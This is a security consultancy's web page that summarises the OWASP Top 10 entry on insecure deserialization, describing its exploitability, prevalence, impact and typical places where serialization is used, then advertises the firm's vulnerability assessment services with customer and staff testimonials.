A8: Insecure Deserialization

App Specific

Exploitation of deserialization is somewhat difficult, as off the shelf exploits rarely work without changes or tweaks to the underlying exploit code.

Prevalence

This issue is included in the Top 10 based on an industry survey and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem.

It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it.

Technical

The impact of deserialization flaws cannot be understated. These flaws can lead to remote code execution attacks, one of the most serious attacks possible. The business impact depends on the protection needs of the application and data.

Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplied by an attacker.

This can result in two primary types of attacks:

Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behaviour during or after deserialization.
Typical data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.

Serialization may be used in applications for:

Remote- and inter-process communication (RPC/IPC)
Wire protocols, web services, message brokers
Caching/Persistence
Databases, cache servers, file systems
HTTP cookies, HTML form parameters, API authentication tokens.

How to detect this security problem?

Valency Networks technical team is highly capable of running app scans and also perform manual vulnerability assessment to find this security problem. We can also help you re-design the code component or provide inputs towards successful fixation.

What Our Customers Say?

Valency Networks is a very techie company, focusing on a continuous improvement in service quality. Our customers like us exactly for that and that helps us keep our quality to the best extent.

Valency Networks is our only preferred vendor because the way they find vulnerabilities in our network is par excellence. We hired them on a long term contract to top up our perimeter and wish to continue with them.

CTO

Fortune 50 Manufaturing Company, Pune

Hardly goes a day when I have not learnt anything new in cyber security space and IT technologies.

Team-mate

for 6+ yrs

Working at Valency Networks helps me gain great knowledge everyday.

Team-mate,

for 3+ yrs

A8: Insecure Deserialization

App Specific

Prevalence

Technical

Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behaviour during or after deserialization.

Typical data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.

Remote- and inter-process communication (RPC/IPC)

Wire protocols, web services, message brokers

Caching/Persistence

Databases, cache servers, file systems

HTTP cookies, HTML form parameters, API authentication tokens.

How to detect this security problem?